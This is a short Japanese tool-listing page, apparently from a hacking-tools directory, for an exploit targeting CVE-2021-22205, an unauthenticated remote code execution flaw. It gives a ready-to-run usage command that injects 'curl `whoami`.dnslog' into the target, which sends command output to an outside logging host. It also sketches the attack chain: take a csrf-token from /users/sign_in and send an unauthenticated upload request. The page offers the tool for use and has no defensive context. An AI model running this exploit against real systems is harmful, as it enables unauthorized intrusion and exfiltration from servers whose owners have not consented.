ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!
CVE-2021-22205 未認証RCE
コミュニティで最も使われているツールを見つけましょう。
すべてのツールを探索
ツールコレクションを閲覧
影響バージョン:
使用方法
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
csrf-token の取得:
/users/sign_in から csrf-token を取得し、前述の CVE-2021-22205 POC を使用してアップロードパケットを構築し、認証されていないアップロードリクエストを実行して、最終的に RCE を達成します。
/users/sign_in
参照: